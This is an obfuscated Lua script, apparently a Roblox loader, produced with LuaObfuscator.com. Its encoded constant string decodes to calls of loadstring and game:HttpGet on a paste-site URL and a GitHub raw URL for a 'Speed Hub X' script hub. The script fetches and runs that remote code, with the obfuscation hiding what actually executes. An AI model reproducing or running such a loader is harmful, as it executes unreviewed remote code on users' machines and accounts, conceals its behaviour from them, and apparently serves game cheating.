--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v91=v2(v0(v30,16));if v19 then local v113=v5(v91,v19);v19=nil;return v113;else return v91;end end end);local function v20(v31,v32,v33) if v33 then local v92=(v31/((570 -(367 + 201))^(v32-(2 -1))))%((5 -(1068 -(68 + 997)))^(((v33-(1 -0)) -(v32-(2 -1))) + (878 -(282 + (1865 -(226 + 1044)))))) ;return v92-(v92%(1638 -(1523 + 114))) ;else local v93=((8 -6) + 0)^(v32-(620 -(555 + 64))) ;return (((v31%(v93 + v93))>=v93) and (932 -(857 + 74))) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=(0 -0) -0 ;local v36;local v37;while true do if (v35==(118 -(32 + 85))) then return (v37 * (251 + 5)) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(50 + 17 + 113)) ;v35=958 -(892 + 65) ;end end end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(952 -(802 + 150))) then v39,v40,v41,v42=v1(v16,v18,v18 + ((15 -8) -4) );v18=v18 + (6 -2) ;v38=1 + (0 -0) ;end if (v38==(998 -(160 + 755 + 82))) then return (v42 * (47505959 -30728743)) + (v41 * (38178 + 27358)) + (v40 * ((1523 -(1069 + 118)) -80)) + v39 ;end end end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(3 -1)) then v48=v20(v45,21,31 + (1080 -(1020 + 60)) );v49=((v20(v45,823 -(368 + 423) )==1) and  -(3 -2)) or (19 -(10 + (1431 -(630 + 793)))) ;v43=11 -8 ;end if (v43==0) then v44=v23();v45=v23();v43=443 -(416 + 26) ;end if (v43==(9 -6)) then if (v48==(0 + 0)) then if (v47==(0 -0)) then return v49 * 0 ;else local v120=438 -(145 + 293) ;while true do if (v120==(430 -(44 + 386))) then v48=1487 -((3381 -2383) + 488) ;v46=(0 -0) + 0 ;break;end end end elseif (v48==2047) then return ((v47==(0 + 0)) and (v49 * (1/(772 -(201 + 571))))) or (v49 * NaN) ;end return v8(v49,v48-((852 + 1309) -(116 + 1022)) ) * (v46 + (v47/((8 -6)^((106 -75) + 21)))) ;end if ((3 -2)==v43) then v46=3 -2 ;v47=(v20(v45,860 -(814 + 45) ,49 -29 ) * ((1 + 1)^(12 + 20))) + v44 ;v43=887 -(261 + 624) ;end end end local function v25(v50) local v51;if  not v50 then local v94=(4807 -3060) -(760 + 987) ;while true do if (v94==(1913 -(1789 + (486 -362)))) then v50=v23();if (v50==(766 -(745 + 21))) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v68=1, #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 0;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do local v112=(function() return 0 -0 ;end)();while true do if (v112~=(0 -0)) then else if (1==v104) then local v123=(function() return 0 -0 ;end)();while true do if (v123~=(0 -0)) then else while true do if (v95==0) then v96=(function() return v97();end)();if (v98(v96, #"<", #"|")==0) then local v156=(function() return 285 -(134 + 151) ;end)();local v157=(function() return;end)();local v158=(function() return;end)();local v159=(function() return;end)();while true do if (v156==1) then local v194=(function() return 0;end)();while true do if (1==v194) then v156=(function() return 2;end)();break;end if ((1665 -(970 + 695))==v194) then v159=(function() return {v99(),v99(),nil,nil};end)();if (v157==0) then local v202=(function() return 0;end)();local v203=(function() return;end)();while true do if (v202~=(0 -0)) then else v203=(function() return 0;end)();while true do if (v203==0) then v159[ #"19("]=(function() return v99();end)();v159[ #"asd1"]=(function() return v99();end)();break;end end break;end end elseif (v157== #"{") then v159[ #"19("]=(function() return v100();end)();elseif (v157==2) then v159[ #"xxx"]=(function() return v100() -((1992 -(582 + 1408))^(55 -39)) ;end)();elseif (v157== #"nil") then local v208=(function() return 0 -0 ;end)();local v209=(function() return;end)();while true do if ((0 -0)~=v208) then else v209=(function() return 1824 -(1195 + 629) ;end)();while true do if (v209~=(0 -0)) then else v159[ #"-19"]=(function() return v100() -(2^16) ;end)();v159[ #"xnxx"]=(function() return v99();end)();break;end end break;end end end v194=(function() return 242 -(187 + 54) ;end)();end end end if (v156~=0) then else local v195=(function() return 780 -(162 + 618) ;end)();while true do if (v195~=(0 + 0)) then else v157=(function() return v98(v96,2, #"xxx");end)();v158=(function() return v98(v96, #".com",4 + 2 );end)();v195=(function() return 1;end)();end if (v195==(1 -0)) then v156=(function() return 1 -0 ;end)();break;end end end if (v156==(1 + 2)) then if (v98(v158, #"asd", #"asd")== #"{") then v159[ #"http"]=(function() return v101[v159[ #"0313"]];end)();end v102[v103]=(function() return v159;end)();break;end if (v156==(1638 -(1373 + 263))) then if (v98(v158, #"~", #" ")== #":") then v159[2]=(function() return v101[v159[1002 -(451 + 549) ]];end)();end if (v98(v158,2,2)~= #"[") then else v159[ #"asd"]=(function() return v101[v159[ #"19("]];end)();end v156=(function() return 3;end)();end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end if (0==v104) then local v124=(function() return 0 + 0 ;end)();while true do if (v124==(1 -0)) then v104=(function() return 1 -0 ;end)();break;end if (v124==0) then v95=(function() return 1384 -(746 + 638) ;end)();v96=(function() return nil;end)();v124=(function() return 1;end)();end end end break;end end end end;end)();local v54=(function() return function(v105,v106,v107) local v108=(function() return 0;end)();local v109=(function() return;end)();while true do if (v108~=0) then else v109=(function() return 0 + 0 ;end)();while true do if (v109==(0 -0)) then local v125=(function() return 341 -(218 + 123) ;end)();while true do if (v125==0) then v105[v106-#"|" ]=(function() return v107();end)();return v105,v106,v107;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #"[",v59 do local v71=(function() return 0;end)();local v72=(function() return;end)();local v73=(function() return;end)();local v74=(function() return;end)();while true do if (v71~=(1582 -(1535 + 46))) then else v74=(function() return nil;end)();while true do if ((0 + 0)==v72) then local v121=(function() return 0 + 0 ;end)();while true do if ((561 -(306 + 254))==v121) then v72=(function() return 1 + 0 ;end)();break;end if (v121==(0 -0)) then v73=(function() return v21();end)();v74=(function() return nil;end)();v121=(function() return 1468 -(899 + 568) ;end)();end end end if ((1 + 0)~=v72) then else if (v73== #"[") then v74=(function() return v21()~=(0 -0) ;end)();elseif (v73==2) then v74=(function() return v24();end)();elseif (v73~= #"19(") then else v74=(function() return v25();end)();end v60[v70]=(function() return v74;end)();break;end end break;end if (v71~=(603 -(268 + 335))) then else v72=(function() return 0;end)();v73=(function() return nil;end)();v71=(function() return 291 -(60 + 230) ;end)();end end end v58[ #"nil"]=(function() return v21();end)();for v75= #"}",v23() do FlatIdent_39B0,Descriptor,v21,v20,v22,v23,v60,v55,v75=(function() return v53(FlatIdent_39B0,Descriptor,v21,v20,v22,v23,v60,v55,v75);end)();end for v76= #">",v23() do v56,v76,v28=(function() return v54(v56,v76,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[573 -(426 + 146) ];local v66=v62[(2 -1) + 1 ];local v67=v62[1459 -(282 + 1174) ];return function(...) local v77=v65;local v78=v66;local v79=v67;local v80=v27;local v81=812 -(569 + 242) ;local v82= -(2 -1);local v83={};local v84={...};local v85=v12("#",...) -((1203 -(373 + 829)) + 0) ;local v86={};local v87={};for v110=(1755 -(476 + 255)) -(706 + 318) ,v85 do if (v110>=v79) then v83[v110-v79 ]=v84[v110 + (1252 -(721 + 530)) ];else v87[v110]=v84[v110 + 1 ];end end local v88=(v85-v79) + (1272 -(945 + 326)) ;local v89;local v90;while true do local v111=0 -0 ;while true do if (v111==(0 + 0)) then v89=v77[v81];v90=v89[1];v111=701 -(271 + 429) ;end if (v111==(1 + 0)) then if (v90<=5) then if (v90<=(1502 -(1408 + 92))) then if ((630<2127) and (v90<=(1086 -(461 + 625)))) then local v127=v89[1290 -(993 + 295) ];local v128=v87[v89[1 + 2 ]];v87[v127 + (1172 -(418 + 753)) ]=v128;v87[v127]=v128[v89[2 + 2 ]];elseif ((v90==(1 + 0)) or (1938==2514)) then v81=v89[1 + 2 ];else local v139=0 + 0 ;local v140;local v141;local v142;local v143;local v144;while true do if ((4255>=55) and ((530 -(406 + 123))==v139)) then v89=v77[v81];v144=v89[(2901 -(369 + 761)) -(1749 + 20) ];v143=v87[v89[1 + 2 ]];v87[v144 + ((766 + 557) -(1249 + 73)) ]=v143;v87[v144]=v143[v89[(2 -0) + 2 ]];v81=v81 + (1146 -(466 + (1286 -607))) ;v139=4 -2 ;end if (v139==((255 -(64 + 174)) -11)) then v87[v89[1902 -(106 + 1794) ]]=v64[v89[1 + 2 ]];v81=v81 + 1 ;v89=v77[v81];v144=v89[1 + 1 ];v143=v87[v89[8 -5 ]];v87[v144 + ((1 + 1) -1) ]=v143;v139=121 -(4 + 110) ;end if (v139==((868 -281) -(57 + 527))) then v89=v77[v81];v144=v89[1429 -(41 + (1722 -(144 + 192))) ];v141,v142=v80(v87[v144](v13(v87,v144 + (104 -(17 + 86)) ,v89[3])));v82=(v142 + v144) -(1 + 0) ;v140=0 -0 ;for v189=v144,v82 do v140=v140 + ((218 -(42 + 174)) -(1 + 0)) ;v87[v189]=v141[v140];end v139=170 -(122 + 44) ;end if ((2999>1156) and (v139==2)) then v89=v77[v81];v87[v89[2 -(0 + 0) ]]=v89[3];v81=v81 + (3 -2) ;v89=v77[v81];v87[v89[2 + 0 + 0 ]]=v89[1 + (1506 -(363 + 1141)) ]~=0 ;v81=v81 + (1 -0) ;v139=68 -(30 + 35) ;end if ((2350>1155) and (v139==((1580 -(1183 + 397)) + 0))) then v140=nil;v141,v142=nil;v143=nil;v144=nil;v87[v89[2]]=v64[v89[3]];v81=v81 + (1258 -(1043 + 214)) ;v139=3 -2 ;end if (v139==(1217 -(323 + 889))) then v87[v89[5 -3 ]]();v81=v81 + (581 -((1098 -737) + 219)) ;v89=v77[v81];v87[v89[322 -(53 + 267) ]]=v64[v89[1 + 2 ]];v81=v81 + (414 -(15 + 398)) ;v89=v77[v81];v139=988 -(18 + 707 + 257) ;end if (v139==(14 -10)) then v81=v81 + 1 + 0 ;v89=v77[v81];v144=v89[2 + 0 ];v87[v144]=v87[v144](v13(v87,v144 + (851 -(20 + 830)) ,v82));v81=v81 + 1 + 0 ;v89=v77[v81];v139=131 -(116 + 10) ;end if (v139==(1 + 6)) then v87[v144]=v143[v89[742 -(542 + 196) ]];break;end end end elseif (v90<=(6 -3)) then v87[v89[1 + 1 + 0 ]]=v64[v89[3]];elseif (v90==(3 + 1)) then do return;end elseif (v87[v89[2]]==v89[2 + (1977 -(1913 + 62)) ]) then v81=v81 + 1 ;else v81=v89[7 -4 ];end elseif ((4029<=4853) and (v90<=(20 -12))) then if ((v90<=(1557 -(1126 + 425))) or (516>3434)) then local v134=405 -(118 + 287) ;local v135;while true do if (v134==0) then v135=v89[7 -5 ];v87[v135]=v87[v135](v13(v87,v135 + 1 ,v82));break;end end elseif (v90>(1128 -(118 + 1003))) then v87[v89[(4 + 1) -3 ]]();else v87[v89[379 -(142 + 235) ]]=v89[13 -(26 -16) ]~=(0 + 0) ;end elseif (v90<=9) then for v136=v89[979 -(553 + 424) ],v89[5 -2 ] do v87[v136]=nil;end elseif ((4046>=3033) and (v90==(9 + 1))) then local v146=0 + 0 ;local v147;local v148;local v149;local v150;while true do if (v146==(2 + 0)) then for v192=v147,v82 do local v193=0 + 0 ;while true do if ((0 + 0)==v193) then v150=v150 + (2 -(1934 -(565 + 1368))) ;v87[v192]=v148[v150];break;end end end break;end if ((v146==(0 -0)) or (2719<=1447)) then v147=v89[4 -2 ];v148,v149=v80(v87[v147](v13(v87,v147 + 1 + 0 ,v89[3])));v146=1;end if (v146==1) then v82=(v149 + v147) -(4 -3) ;v150=753 -(239 + 514) ;v146=1 + 1 ;end end else v87[v89[(5005 -3674) -((2458 -(1477 + 184)) + 532) ]]=v89[3 + (0 -0) ];end v81=v81 + 1 + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403333Q00682Q7470733A2Q2F6170692E72756269732E612Q702F76322F73637261702F416E4D495061715462737943625A52342F72617703523Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F6F2Q626C6F782F53702Q65642D4875622D582F726566732F68656164732F6D61696E2F53702Q65643230487562323058001B3Q00120B3Q00014Q0009000100013Q0026053Q0002000100010004013Q0002000100120B000100013Q00260500010005000100010004013Q00050001001203000200023Q001202000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q00030003000400120B000500064Q000A000300054Q000600023Q00022Q00080002000100010004013Q001A00010004013Q000500010004013Q001A00010004013Q000200012Q00043Q00017Q00",v9(),...);
